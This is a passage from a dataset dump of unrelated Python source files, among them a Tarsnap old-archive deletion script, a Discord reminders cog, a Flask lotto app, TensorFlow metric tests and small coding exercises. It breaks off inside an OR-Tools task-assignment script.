epochs=1000)\n \n model_path = '../../models/model_sae_{}.mdl'.format(val)\n encoder_path = '../../models/encoder_sae_{}.mdl'.format(val)\n \n sae.save(model_path)\n sae_encoder.save(encoder_path)\n\n his.append(sae_his)\n\npklfile = '../../data/history_sae.pkl'\nwith open(pklfile, 'wb') as fo:\n pickle.dump(his, fo)\n\n\n\nelapsed_time = time.strftime(\"%H:%M:%S\", time.gmtime(time.time() - start))\nprint('sae_l_test finished: {}'.format(elapsed_time), file=sys.stderr)","sub_path":"signatures/AE/tests/sae_l_test.py","file_name":"sae_l_test.py","file_ext":"py","file_size_in_byte":1897,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"80"} +{"seq_id":"509072460","text":"import subprocess, sys\nfrom datetime import datetime, timedelta\nfrom dateutil import parser as date_parser\nfrom tarsnap_config import tarsnap_config\n\ndelete_message_format = \"Deleting archive: {archive} ({delete_number}/{total_deletes})\"\nerror_message_format = \"Failed to delete archive {archive} with error: {error}\"\nsuccess_message_format = \"Deleted archive: {archive}\"\n\nreference_date = datetime.now()\ntime_interval = 0\ntime_unit = ''\n\ntry:\n time_interval = int(sys.argv[1])\n time_unit = sys.argv[2].lower()\nexcept ValueError:\n pass\n\nif time_interval <= 0 or time_unit not in ['seconds', 'minutes', 'hours', 'days', 'weeks']:\n print(\"Please provide the minimum age of the archives you want to delete.\\n\"\n \"Usage: python tarsnap_delete_old.py \\n\"\n \"Ex: python tarsnap_delete_old.py 7 days\")\n sys.exit()\n\ndelta = None\nif time_unit == 'seconds':\n delta = timedelta(seconds=time_interval)\nelif time_unit == 'minutes':\n delta = timedelta(minutes=time_interval)\nelif time_unit == 'hours':\n delta = timedelta(hours=time_interval)\nelif time_unit == 'days':\n delta = timedelta(days=time_interval)\nelif time_unit == 'weeks':\n delta = timedelta(weeks=time_interval)\nelse:\n pass\n\nif delta == None:\n print(\"Invalid time delta.\")\n sys.exit()\n\nprint(\"Getting Tarsnap archives...\")\n\nlist_request_args = [\"tarsnap\", \"--list-archives\", \"--keyfile\", tarsnap_config[\"keyfile\"]]\nlist_request = subprocess.Popen(list_request_args, stdout=subprocess.PIPE, stderr=subprocess.PIPE)\nlist_response, list_error = list_request.communicate()\n\nif list_error != None and len(list_error) > 0:\n list_error_message_format = \"Failed to list Tarsnap archives with error: {error}\"\n print(error_message_format.format(error=list_error))\n sys.exit()\n\narchives_list = sorted([item.strip() for item in list_response.splitlines()])\narchives_to_delete = []\n\nif len(archives_list) > 0:\n for archive in archives_list:\n components = archive.rsplit('-', 3)\n archive_name = components[0]\n archive_date = date_parser.parse('-'.join(components[1:]))\n if reference_date - archive_date > delta:\n archives_to_delete.append(archive)\nelse:\n print(\"No archives found.\")\n sys.exit()\n\ntotal_deletes = len(archives_to_delete)\ndelete_number = 1\n\nif total_deletes > 0:\n for archive in archives_to_delete:\n print(delete_message_format.format(\n archive=archive,\n delete_number=delete_number,\n total_deletes=total_deletes))\n\n delete_request_args = [\n \"tarsnap\", \"-d\", \n \"--keyfile\", tarsnap_config[\"keyfile\"], \n \"--cachedir\", tarsnap_config[\"cachedir\"],\n \"-f\", archive]\n\n delete_request = subprocess.Popen(delete_request_args, stdout=subprocess.PIPE, stderr=subprocess.PIPE)\n delete_response, delete_error = delete_request.communicate()\n\n if delete_error != None and len(delete_error) > 0:\n print(error_message_format.format(archive=archive, error=error))\n else:\n print(success_message_format.format(archive=archive))\n\n delete_number = delete_number + 1\nelse:\n print(\"No archives to delete.\")\n sys.exit()\n\nprint(\"Deleted old archives.\")","sub_path":"tarsnap_delete_old.py","file_name":"tarsnap_delete_old.py","file_ext":"py","file_size_in_byte":3275,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"80"} +{"seq_id":"257915743","text":"# https://leetcode.com/problems/median-of-two-sorted-arrays/description/\n\n\nclass Solution:\n def findMedianSortedArrays(self, nums1, nums2):\n \"\"\"\n :type nums1: List[int]\n :type nums2: List[int]\n :rtype: float\n \"\"\"\n\n l1, l2 = len(nums1), len(nums2)\n if l1 > l2:\n nums1, nums2, l1, l2 = nums2, nums1, l2, l1\n\n # Initiate for left part of nums1 (i elements) and left part of nums2 (j elements)\n # The target for i and j is that whole left part is less than whole right part\n # (nums1) ...i... | ...l1 - i... (i elements: nums1[0] ... nums1[i-1])\n # (nums2) ...j... | ...l2 - j... (j elements: nums2[0] ... nums2[j-1])\n # | \n\n i_min, i_max = 0, l1\n while i_min <= i_max:\n i = (i_min + i_max) // 2\n j = (l1 + l2 + 1) // 2 - i # assume that left part have equal or more elements than right part\n # j is non-negative then l1 must NOT be greater than l2\n if i >= 1 and nums1[i-1] > nums2[j]: # i >= 1 -> j < l2, proved by math based on l1 <= l2\n i_max = i - 1\n elif i < l1 and nums2[j-1] > nums1[i]: # i < l1 -> j > 0, proved by math based on l1 <= l2\n i_min = i + 1\n else:\n # Appropriate i, j found\n if i == 0:\n max_left = nums2[j-1]\n elif j == 0:\n max_left = nums1[i-1]\n else:\n max_left = max(nums1[i-1], nums2[j-1])\n\n if (l1 + l2) % 2 == 1:\n return max_left\n\n if i == l1:\n min_right = nums2[j]\n elif j == l2:\n min_right = nums1[i]\n else:\n min_right = min(nums1[i], nums2[j])\n\n return (max_left + min_right) / 2\n","sub_path":"_PYTHON_/_problems_/_LC_/algorithms/median_of_two_sorted_arrays.py","file_name":"median_of_two_sorted_arrays.py","file_ext":"py","file_size_in_byte":1953,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"80"} +{"seq_id":"410655583","text":"# PyGlassBasicDialogManager.py\n# (C)2012-2013\n# Scott Ernst\n\nimport os\n\nfrom PySide import QtCore\nfrom PySide import QtGui\n\nfrom pyaid.file.FileUtils import FileUtils\n\n#___________________________________________________________________________________________________ PyGlassBasicDialogManager\nclass PyGlassBasicDialogManager(QtCore.QObject):\n\n#===================================================================================================\n# C L A S S\n\n#___________________________________________________________________________________________________ openAbout\n @classmethod\n def openAbout(cls, parent, title, text):\n return QtGui.QMessageBox.about(parent=parent, title=title, text=text)\n\n#___________________________________________________________________________________________________ openYesNo\n @classmethod\n def openYesNo(cls, parent, header, message =None, defaultToYes =True):\n dlg = QtGui.QMessageBox(parent=parent)\n dlg.setText(header)\n if message:\n dlg.setInformativeText(message)\n dlg.setStandardButtons(QtGui.QMessageBox.Yes | QtGui.QMessageBox.No)\n dlg.setDefaultButton(QtGui.QMessageBox.Yes if defaultToYes else QtGui.QMessageBox.No)\n result = dlg.exec_()\n return result == QtGui.QMessageBox.Yes\n\n#___________________________________________________________________________________________________ openOk\n @classmethod\n def openOk(cls, parent, header, message =None):\n dlg = QtGui.QMessageBox(parent=parent)\n dlg.setText(header)\n if message:\n dlg.setInformativeText(message)\n dlg.setStandardButtons(QtGui.QMessageBox.Ok)\n dlg.setDefaultButton(QtGui.QMessageBox.Ok)\n result = dlg.exec_()\n return True\n\n#___________________________________________________________________________________________________ openTextQuery\n @classmethod\n def openTextQuery(cls, parent, header, message =None, defaultText =None):\n \"\"\" Opens a text query dialog. If the dialog was canceled the method returns None,\n otherwise it returns the string set by the user. \"\"\"\n\n if defaultText is None:\n defaultText = u''\n result = QtGui.QInputDialog.getText(parent, header, message, text=defaultText)\n if not result[-1]:\n return None\n return result[0]\n\n#___________________________________________________________________________________________________ browseForDirectory\n @classmethod\n def browseForDirectory(cls, parent, caption =None, defaultPath =None):\n out = QtGui.QFileDialog.getExistingDirectory(\n parent,\n caption=caption if caption else u'Select a Directory',\n dir=defaultPath if defaultPath else os.path.expanduser('~'))\n\n if not out:\n return out\n return FileUtils.cleanupPath(out, isDir=True)\n\n#___________________________________________________________________________________________________ browseForFileOpen\n @classmethod\n def browseForFileOpen(cls, parent, caption =None, defaultPath =None):\n out = QtGui.QFileDialog.getOpenFileName(\n parent,\n caption=caption if caption else u'Select a File',\n dir=defaultPath if defaultPath else os.path.expanduser('~'))\n\n if not out or not out[0]:\n return out\n return FileUtils.cleanupPath(out[0], isFile=True)\n","sub_path":"src/pyglass/dialogs/PyGlassBasicDialogManager.py","file_name":"PyGlassBasicDialogManager.py","file_ext":"py","file_size_in_byte":3505,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"80"} +{"seq_id":"96188312","text":"# ===== import: python function\n\n# ===== import: palantir functions\nfrom transforms.api import transform, incremental, Input, Output, configure\n\n# ===== import: our functions\nfrom python.pnl.schema.schema_dl800_new_amended_cancelled_deals import typed_output_schema\nfrom python.bp_flush_control import DL800_PROFILE\nfrom python.util.read_file_data import read_raw_write_typed\nfrom python.util.schema_utils import compute_typed, reorder_columns, is_multiline\n\n# ===== import: logging\nimport logging\nlogger = logging.getLogger(__name__)\n\n\ndef this_transform(df, typed_output_schema):\n df = compute_typed(df, typed_output_schema)\n df = reorder_columns(df, typed_output_schema)\n return df\n\n\n@configure(profile=DL800_PROFILE)\n@incremental()\n@transform(\n transform_output=Output(\"/BP/IST-IG-DD/data/technical/pnl/typed/endur/dl800_new_amended_cancelled_deals\"),\n transform_input=Input(\n \"/BP/IST-IG-SS-Systems/data/raw/endur/dl800-new_amended_cancelled_deals/dl800-new_amended_cancelled_deals\"),\n error_output=Output(\"/BP/IST-IG-DD/data/technical/pnl/typed/endur/errors/dl800_new_amended_cancelled_deals_errors\"),\n log_output=Output(\"/BP/IST-IG-DD/data/technical/pnl/typed/endur/log/dl800_new_amended_cancelled_deals_log\"),\n)\ndef my_compute_function(transform_input, transform_output, error_output, log_output):\n '''\n Version: V0 R1\n This function:\n 1. renames columns\n 2. casts the columns to the correct types\n\n Args:\n transform_input (TransformInput)\n transform_output (TransformOutput)\n '''\n read_raw_write_typed(\n transform_input,\n transform_output,\n typed_output_schema,\n is_multiline(transform_input),\n this_transform,\n logger,\n error_output,\n log_output,\n )\n","sub_path":"latest_integration/transforms-python/src/python/pnl/typed/endur/dl800_new_amended_cancelled_deals.py","file_name":"dl800_new_amended_cancelled_deals.py","file_ext":"py","file_size_in_byte":1797,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"80"} +{"seq_id":"612102160","text":"#/lotto 랜덤 넘버를 추천해주고, 최신 로또와 비교하여 등수를 알려주는 기능\nfrom flask import Flask, render_template\nimport requests\nimport random\nfrom bs4 import BeautifulSoup\nfrom datetime import datetime\n\napp = Flask(__name__)\n\n\nnumbers = range(1,46)\nlotto = random.sample(numbers,6)\n\nurl = 'https://www.dhlottery.co.kr/common.do?method=getLottoNumber&drwNo=866'\nres = requests.get(url)\ndic_lotto = res.json()\nwinner = []\nfor i in range(1,7):\n winner.append(dic_lotto[\"drwtNo\"+str(i)])\n winner = sorted(winner)\n\n@app.route(\"/\")\ndef home():\n return render_template('home.html')\n\n#로또 랜덤 넘버를 추천해주기\n@app.route(\"/lotto\")\ndef lotto2():\n \n return render_template('lotto.html',lottonum=str(sorted(lotto)))\n\n\n# 최신 로또 번호를 가져오기\n\n@app.route(\"/thiswinner\")\ndef thiswinner():\n \n return render_template('winner.html',winnernum=winner)\n\n#등수 알려주기\n@app.route(\"/checkwin\")\ndef checkwin():\n count = len(set(winner) & set(lotto))\n if count == 6 : \n result = 1\n elif count == 5:\n result = 3\n elif count == 4:\n result = 4\n elif count == 3:\n result = 5\n else:\n result = 0\n return render_template('checkwin.html',checkwin=result)\n\n\nif __name__ == \"__main__\" :\n app.run(debug=True)","sub_path":"day03/dynamic/lotto_real.py","file_name":"lotto_real.py","file_ext":"py","file_size_in_byte":1323,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"79"} +{"seq_id":"441424156","text":"import asyncio\nimport datetime\nimport logging\nimport random\nimport textwrap\n\nfrom aiohttp import ClientResponseError\nfrom dateutil.relativedelta import relativedelta\nfrom discord import Colour, Embed\nfrom discord.ext.commands import Bot, Context, group\n\nfrom bot.constants import (\n Channels, Icons, Keys, NEGATIVE_REPLIES,\n POSITIVE_REPLIES, Roles, URLs\n)\nfrom bot.pagination import LinePaginator\nfrom bot.utils.scheduling import create_task\nfrom bot.utils.time import humanize_delta, parse_rfc1123, wait_until\n\nlog = logging.getLogger(__name__)\n\nSTAFF_ROLES = (Roles.owner, Roles.admin, Roles.moderator, Roles.helpers)\nWHITELISTED_CHANNELS = (Channels.bot,)\nMAXIMUM_REMINDERS = 5\n\n\n# The scheduling parts of this cog are pretty much directly copied\n# from the moderation cog. I'll be working on making it more\n# webscale:tm: as soon as possible, because this is a mess :D\nclass Reminders:\n\n def __init__(self, bot: Bot):\n self.bot = bot\n\n self.headers = {\"X-API-Key\": Keys.site_api}\n self.reminder_tasks = {}\n\n async def on_ready(self):\n # Get all the current reminders for re-scheduling\n response = await self.bot.http_session.get(\n url=URLs.site_reminders_api,\n headers=self.headers\n )\n\n response_data = await response.json()\n\n # Find the current time, timezone-aware.\n now = datetime.datetime.utcnow().replace(tzinfo=datetime.timezone.utc)\n loop = asyncio.get_event_loop()\n\n for reminder in response_data[\"reminders\"]:\n remind_at = parse_rfc1123(reminder[\"remind_at\"])\n\n # If the reminder is already overdue ...\n if remind_at < now:\n late = relativedelta(now, remind_at)\n await self.send_reminder(reminder, late)\n\n else:\n self.schedule_reminder(loop, reminder)\n\n @staticmethod\n async def _send_confirmation(ctx: Context, response: dict, on_success: str):\n \"\"\"\n Send an embed confirming whether or not a change was made successfully.\n\n :return: A Boolean value indicating whether it failed (True) or passed (False)\n \"\"\"\n\n embed = Embed()\n\n if not response.get(\"success\"):\n embed.colour = Colour.red()\n embed.title = random.choice(NEGATIVE_REPLIES)\n embed.description = response.get(\"error_message\", \"An unexpected error occurred.\")\n\n log.warn(f\"Unable to create/edit/delete a reminder. Response: {response}\")\n failed = True\n\n else:\n embed.colour = Colour.green()\n embed.title = random.choice(POSITIVE_REPLIES)\n embed.description = on_success\n\n failed = False\n\n await ctx.send(embed=embed)\n return failed\n\n def schedule_reminder(self, loop: asyncio.AbstractEventLoop, reminder):\n \"\"\"\n Schedule a reminder from the bot at the requested time.\n\n :param loop: the asyncio event loop\n :param reminder: the data of the reminder.\n \"\"\"\n\n # Avoid duplicate schedules, just in case.\n reminder_id = reminder[\"id\"]\n if reminder_id in self.reminder_tasks:\n return\n\n # Make a scheduled task and add it to the list\n task: asyncio.Task = create_task(loop, self._scheduled_reminder(reminder))\n self.reminder_tasks[reminder_id] = task\n\n async def _scheduled_reminder(self, reminder):\n \"\"\"\n A coroutine which sends the reminder once the time is reached.\n\n :param reminder: the data of the reminder.\n :return:\n \"\"\"\n\n reminder_id = reminder[\"id\"]\n reminder_datetime = parse_rfc1123(reminder[\"remind_at\"])\n\n # Send the reminder message once the desired duration has passed\n await wait_until(reminder_datetime)\n await self.send_reminder(reminder)\n\n log.debug(f\"Deleting reminder {reminder_id} (the user has been reminded).\")\n await self._delete_reminder(reminder)\n\n # Now we can begone with it from our schedule list.\n self.cancel_reminder(reminder_id)\n\n def cancel_reminder(self, reminder_id: str):\n \"\"\"\n Un-schedules a task to send a reminder.\n\n :param reminder_id: the ID of the reminder in question\n \"\"\"\n\n task = self.reminder_tasks.get(reminder_id)\n\n if task is None:\n log.warning(f\"Failed to unschedule {reminder_id}: no task found.\")\n return\n\n task.cancel()\n log.debug(f\"Unscheduled {reminder_id}.\")\n del self.reminder_tasks[reminder_id]\n\n async def _delete_reminder(self, reminder_id: str):\n \"\"\"\n Delete a reminder from the database, given its ID.\n\n :param reminder_id: The ID of the reminder.\n \"\"\"\n\n # The API requires a list, so let's give it one :)\n json_data = {\n \"reminders\": [\n reminder_id\n ]\n }\n\n await self.bot.http_session.delete(\n url=URLs.site_reminders_api,\n headers=self.headers,\n json=json_data\n )\n\n # Now we can remove it from the schedule list\n self.cancel_reminder(reminder_id)\n\n async def _reschedule_reminder(self, reminder):\n \"\"\"\n Reschedule a reminder object.\n\n :param reminder: The reminder to be rescheduled.\n \"\"\"\n\n loop = asyncio.get_event_loop()\n\n self.cancel_reminder(reminder[\"id\"])\n self.schedule_reminder(loop, reminder)\n\n async def send_reminder(self, reminder, late: relativedelta = None):\n \"\"\"\n Send the reminder.\n\n :param reminder: The data about the reminder.\n :param late: How late the reminder is (if at all)\n \"\"\"\n\n channel = self.bot.get_channel(int(reminder[\"channel_id\"]))\n user = self.bot.get_user(int(reminder[\"user_id\"]))\n\n embed = Embed()\n embed.colour = Colour.blurple()\n embed.set_author(\n icon_url=Icons.remind_blurple,\n name=\"It has arrived!\"\n )\n\n embed.description = f\"Here's your reminder: `{reminder['content']}`\"\n\n if late:\n embed.colour = Colour.red()\n embed.set_author(\n icon_url=Icons.remind_red,\n name=f\"Sorry it arrived {humanize_delta(late, max_units=2)} late!\"\n )\n\n await channel.send(\n content=user.mention,\n embed=embed\n )\n await self._delete_reminder(reminder[\"id\"])\n\n @group(name=\"remind\", aliases=(\"reminder\", \"reminders\"), invoke_without_command=True)\n async def remind_group(self, ctx: Context, duration: str, *, content: str):\n \"\"\"\n Commands for managing your reminders.\n \"\"\"\n\n await ctx.invoke(self.new_reminder, duration=duration, content=content)\n\n @remind_group.command(name=\"new\", aliases=(\"add\", \"create\"))\n async def new_reminder(self, ctx: Context, duration: str, *, content: str):\n \"\"\"\n Set yourself a simple reminder.\n \"\"\"\n\n embed = Embed()\n\n # Make sure the reminder should actually be made.\n if ctx.author.top_role.id not in STAFF_ROLES:\n\n # If they don't have permission to set a reminder in this channel\n if ctx.channel.id not in WHITELISTED_CHANNELS:\n embed.colour = Colour.red()\n embed.title = random.choice(NEGATIVE_REPLIES)\n embed.description = \"Sorry, you can't do that here!\"\n\n return await ctx.send(embed=embed)\n\n # Get their current active reminders\n response = await self.bot.http_session.get(\n url=URLs.site_reminders_user_api.format(user_id=ctx.author.id),\n headers=self.headers\n )\n\n active_reminders = await response.json()\n\n # Let's limit this, so we don't get 10 000\n # reminders from kip or something like that :P\n if len(active_reminders) > MAXIMUM_REMINDERS:\n embed.colour = Colour.red()\n embed.title = random.choice(NEGATIVE_REPLIES)\n embed.description = \"You have too many active reminders!\"\n\n return await ctx.send(embed=embed)\n\n # Now we can attempt to actually set the reminder.\n try:\n response = await self.bot.http_session.post(\n url=URLs.site_reminders_api,\n headers=self.headers,\n json={\n \"user_id\": str(ctx.author.id),\n \"duration\": duration,\n \"content\": content,\n \"channel_id\": str(ctx.channel.id)\n }\n )\n\n response_data = await response.json()\n\n # AFAIK only happens if the user enters, like, a quintillion weeks\n except ClientResponseError:\n embed.colour = Colour.red()\n embed.title = random.choice(NEGATIVE_REPLIES)\n embed.description = (\n \"An error occurred while adding your reminder to the database. \"\n \"Did you enter a reasonable duration?\"\n )\n\n log.warn(f\"User {ctx.author} attempted to create a reminder for {duration}, but failed.\")\n\n return await ctx.send(embed=embed)\n\n # Confirm to the user whether or not it worked.\n failed = await self._send_confirmation(\n ctx, response_data,\n on_success=\"Your reminder has been created successfully!\"\n )\n\n # If it worked, schedule the reminder.\n if not failed:\n loop = asyncio.get_event_loop()\n self.schedule_reminder(loop=loop, reminder=response_data[\"reminder\"])\n\n @remind_group.command(name=\"list\")\n async def list_reminders(self, ctx: Context):\n \"\"\"\n View a paginated embed of all reminders for your user.\n \"\"\"\n\n # Get all the user's reminders from the database.\n response = await self.bot.http_session.get(\n url=URLs.site_reminders_user_api,\n params={\"user_id\": str(ctx.author.id)},\n headers=self.headers\n )\n\n data = await response.json()\n now = datetime.datetime.utcnow().replace(tzinfo=datetime.timezone.utc)\n\n # Make a list of tuples so it can be sorted by time.\n reminders = [\n (rem[\"content\"], rem[\"remind_at\"], rem[\"friendly_id\"]) for rem in data[\"reminders\"]\n ]\n\n reminders.sort(key=lambda rem: rem[1])\n\n lines = []\n\n for index, (content, remind_at, friendly_id) in enumerate(reminders):\n # Parse and humanize the time, make it pretty :D\n remind_datetime = parse_rfc1123(remind_at)\n time = humanize_delta(relativedelta(remind_datetime, now))\n\n text = textwrap.dedent(f\"\"\"\n **Reminder #{index}:** *expires in {time}* (ID: {friendly_id})\n {content}\n \"\"\").strip()\n\n lines.append(text)\n\n embed = Embed()\n embed.colour = Colour.blurple()\n embed.title = f\"Reminders for {ctx.author}\"\n\n # Remind the user that they have no reminders :^)\n if not lines:\n embed.description = \"No active reminders could be found.\"\n return await ctx.send(embed=embed)\n\n # Construct the embed and paginate it.\n embed.colour = Colour.blurple()\n\n await LinePaginator.paginate(\n lines,\n ctx, embed,\n max_lines=3,\n empty=True\n )\n\n @remind_group.group(name=\"edit\", aliases=(\"change\", \"modify\"), invoke_without_command=True)\n async def edit_reminder_group(self, ctx: Context):\n \"\"\"\n Commands for modifying your current reminders.\n \"\"\"\n\n await ctx.invoke(self.bot.get_command(\"help\"), \"reminders\", \"edit\")\n\n @edit_reminder_group.command(name=\"duration\", aliases=(\"time\",))\n async def edit_reminder_duration(self, ctx: Context, friendly_id: str, duration: str):\n \"\"\"\n Edit one of your reminders' duration.\n \"\"\"\n\n # Send the request to update the reminder in the database\n response = await self.bot.http_session.patch(\n url=URLs.site_reminders_user_api,\n headers=self.headers,\n json={\n \"user_id\": str(ctx.author.id),\n \"friendly_id\": friendly_id,\n \"duration\": duration\n }\n )\n\n # Send a confirmation message to the channel\n response_data = await response.json()\n failed = await self._send_confirmation(\n ctx, response_data,\n on_success=\"That reminder has been edited successfully!\"\n )\n\n if not failed:\n await self._reschedule_reminder(response_data[\"reminder\"])\n\n @edit_reminder_group.command(name=\"content\", aliases=(\"reason\",))\n async def edit_reminder_content(self, ctx: Context, friendly_id: str, *, content: str):\n \"\"\"\n Edit one of your reminders' content.\n \"\"\"\n\n # Send the request to update the reminder in the database\n response = await self.bot.http_session.patch(\n url=URLs.site_reminders_user_api,\n headers=self.headers,\n json={\n \"user_id\": str(ctx.author.id),\n \"friendly_id\": friendly_id,\n \"content\": content\n }\n )\n\n # Send a confirmation message to the channel\n response_data = await response.json()\n failed = await self._send_confirmation(\n ctx, response_data,\n on_success=\"That reminder has been edited successfully!\"\n )\n\n if not failed:\n await self._reschedule_reminder(response_data[\"reminder\"])\n\n @remind_group.command(\"delete\", aliases=(\"remove\",))\n async def delete_reminder(self, ctx: Context, friendly_id: str):\n \"\"\"\n Delete one of your active reminders.\n \"\"\"\n\n # Send the request to delete the reminder from the database\n response = await self.bot.http_session.delete(\n url=URLs.site_reminders_user_api,\n headers=self.headers,\n json={\n \"user_id\": str(ctx.author.id),\n \"friendly_id\": friendly_id\n }\n )\n\n response_data = await response.json()\n failed = await self._send_confirmation(\n ctx, response_data,\n on_success=\"That reminder has been deleted successfully!\"\n )\n\n if not failed:\n self.cancel_reminder(response_data[\"reminder_id\"])\n\n\ndef setup(bot: Bot):\n bot.add_cog(Reminders(bot))\n log.info(\"Cog loaded: Reminders\")\n","sub_path":"bot/cogs/reminders.py","file_name":"reminders.py","file_ext":"py","file_size_in_byte":14633,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"79"} +{"seq_id":"558428952","text":"# 41. A Confederação Nacional de Natação precisa de um programa que leia o ano\r\n# de nascimento de um atleta e mostre sua categoria, de acordo com a idade:\r\n# > Até 9 anos: MIRIM\r\n# > Até 14 anos: INFANTIL\r\n# > Até 19 anos: JÚNIOR\r\n# > Até 25 anos: SÊNIOR\r\n# > Acima: MASTER\r\n\r\nfrom datetime import date\r\n\r\natual = date.today().year\r\nnascimento = int(input('Ano de nascimento: '))\r\nidade = atual - nascimento\r\nprint(f'O atleta tem {idade} anos.')\r\nif idade <= 9:\r\n print('Classificação: MIRIM')\r\nelif idade <= 14:\r\n # No 1º if já é menor/igual a 9. Se não for, com certeza será maior, então\r\n # seria redundância informar elif idade > 9 and <= 14\r\n print('Classificação: INFANTIL')\r\nelif idade <= 19:\r\n print('Classificação: JÚNIOR')\r\nelif idade <= 25:\r\n print('Classificação: SÊNIOR')\r\nelse:\r\n print('Classificação: MASTER')\r\n","sub_path":"Mundo 02: Estruturas de Controle/14. Exercícios: Condições II (Aninhadas)/41. Classificando atletas.py","file_name":"41. Classificando atletas.py","file_ext":"py","file_size_in_byte":877,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"79"} +{"seq_id":"41828407","text":"#https://www.hackerrank.com/challenges/ctci-ransom-note\nfrom collections import Counter\ndef ransom_note(magazine, rasom):\n return (Counter(rasom) - Counter(magazine)) == {}\n\n\nm, n = map(int, input().strip().split(' '))\nmagazine = input().strip().split(' ')\nransom = input().strip().split(' ')\nanswer = ransom_note(magazine, ransom)\nif(answer):\n print(\"Yes\")\nelse:\n print(\"No\")\n","sub_path":"cracking the code interview/ransom-note.py","file_name":"ransom-note.py","file_ext":"py","file_size_in_byte":386,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"79"} +{"seq_id":"256358642","text":"\"\"\"Tests for t2t_transformer.tensor2tensor.utils.metrics.\"\"\"\nfrom __future__ import absolute_import\nfrom __future__ import division\nfrom __future__ import print_function\n\nimport numpy as np\n\nimport tensorflow as tf\nfrom utils import metrics\n\n\nclass MetricsTest(tf.test.TestCase):\n\n def testAccuracyMetric(self):\n predictions = np.random.randint(1, 5, size=(12, 12, 12, 1))\n targets = np.random.randint(1, 5, size=(12, 12, 12, 1))\n expected = np.mean((predictions == targets).astype(float))\n with self.test_session() as session:\n scores, _ = metrics.padded_accuracy(\n tf.one_hot(predictions, depth=5, dtype=tf.float32),\n tf.constant(targets, dtype=tf.int32))\n a = tf.reduce_mean(scores)\n session.run(tf.global_variables_initializer())\n actual = session.run(a)\n self.assertAlmostEqual(actual, expected)\n\n def testAccuracyTopKMetric(self):\n predictions = np.random.randint(1, 5, size=(12, 12, 12, 1))\n targets = np.random.randint(1, 5, size=(12, 12, 12, 1))\n expected = np.mean((predictions == targets).astype(float))\n with self.test_session() as session:\n predicted = tf.one_hot(predictions, depth=5, dtype=tf.float32)\n scores1, _ = metrics.padded_accuracy_topk(\n predicted, tf.constant(targets, dtype=tf.int32), k=1)\n scores2, _ = metrics.padded_accuracy_topk(\n predicted, tf.constant(targets, dtype=tf.int32), k=7)\n a1 = tf.reduce_mean(scores1)\n a2 = tf.reduce_mean(scores2)\n session.run(tf.global_variables_initializer())\n actual1, actual2 = session.run([a1, a2])\n self.assertAlmostEqual(actual1, expected)\n self.assertAlmostEqual(actual2, 1.0)\n\n def testSequenceAccuracyMetric(self):\n predictions = np.random.randint(4, size=(12, 12, 12, 1))\n targets = np.random.randint(4, size=(12, 12, 12, 1))\n expected = np.mean(\n np.prod((predictions == targets).astype(float), axis=(1, 2)))\n with self.test_session() as session:\n scores, _ = metrics.padded_sequence_accuracy(\n tf.one_hot(predictions, depth=4, dtype=tf.float32),\n tf.constant(targets, dtype=tf.int32))\n a = tf.reduce_mean(scores)\n session.run(tf.global_variables_initializer())\n actual = session.run(a)\n self.assertEqual(actual, expected)\n\n def testNegativeLogPerplexity(self):\n predictions = np.random.randint(4, size=(12, 12, 12, 1))\n targets = np.random.randint(4, size=(12, 12, 12, 1))\n with self.test_session() as session:\n scores, _ = metrics.padded_neg_log_perplexity(\n tf.one_hot(predictions, depth=4, dtype=tf.float32),\n tf.constant(targets, dtype=tf.int32))\n a = tf.reduce_mean(scores)\n session.run(tf.global_variables_initializer())\n actual = session.run(a)\n self.assertEqual(actual.shape, ())\n\n\nif __name__ == '__main__':\n tf.test.main()\n","sub_path":"Google/benchmarks/transformer/implementations/tpu-v3-32-transformer/transformer/utils/metrics_test.py","file_name":"metrics_test.py","file_ext":"py","file_size_in_byte":2846,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"79"} +{"seq_id":"86887721","text":"\nfrom numpy.random import normal\nfrom numpy import rint\nimport random\nimport time\nfrom ortools.linear_solver import pywraplp\n\ndef main():\n #-------------------------------------------\n #randomize code created by Jeremy;\n def prMatrix(x):\n for row in x:\n for val in row:\n print(val,end=',')\n print()\n print()\n # example array of task costs on different nodes\n n=32 #number of tasks to be allocated\n\n x = [ [50]*n, [40]*n, [40]*n, [10]*n] #8 nodes\n\n print (x)\n print('initial x:')\n print('----------')\n prMatrix(x)\n\n\n ####### @jsinger new perturbation code for cost matrix\n # thresholds for changing costs\n COEFFICIENT_OF_VARIATION=0.5 # c.o.v. = stdev / mean = sigma/mu\n # try different values - between 0 and 1?\n for i in range(len(x)):\n for j in range(len(x[i])):\n mu = x[i][j]\n sigma = COEFFICIENT_OF_VARIATION * mu\n updated_value = int(rint(normal(mu, sigma)))\n x[i][j] = max(0, updated_value) # no negative costs!\n\n ##########\n\n print('final x:')\n print('----------')\n prMatrix(x)\n\n #-------------------------------------------\n #begin Google-or Tool;\n # Data\n costs = x\n num_workers = len(costs)\n num_tasks = len(costs[0])\n\n node_cap = [(n*0.15),(n*0.2),(n*0.2),(n*0.5)]\n\n\n print (node_cap)\n\n # Solver\n # Create the mip solver with the SCIP backend.\n #solver = pywraplp.Solver.CreateSolver('MIP')\n\n solver = pywraplp.Solver('SolveAssignmentProblem',\n pywraplp.Solver.CBC_MIXED_INTEGER_PROGRAMMING)\n\n start = time.time()\n edge_devices = ['192.168.1.222', '192.168.1.168', '192.168.1.182', '192.168.1.131']\n new_edge_devices = []\n e_devices='('\n\n # Variables\n # x[i, j] is an array of 0-1 variables, which will be 1\n # if worker i is assigned to task j.\n x = {}\n for i in range(num_workers):\n for j in range(num_tasks):\n x[i, j] = solver.IntVar(0, 1, '')\n\n # Constraints\n # Number of tasks assinged to each node less than the node capacitiy!\n for i in range(num_workers):\n solver.Add(solver.Sum([x[i, j] for j in range(num_tasks)]) <= node_cap[i])\n\n # Each task is assigned to exactly one worker.\n for j in range(num_tasks):\n solver.Add(solver.Sum([x[i, j] for i in range(num_workers)]) == 1)\n\n # Objective\n objective_terms = []\n for i in range(num_workers):\n for j in 